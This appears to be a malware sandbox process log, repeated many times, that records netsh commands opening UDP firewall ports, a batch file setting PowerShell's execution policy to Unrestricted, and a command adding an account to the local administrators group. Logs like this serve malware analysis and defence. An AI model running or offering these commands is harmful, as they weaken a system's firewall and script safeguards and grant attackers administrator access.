C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
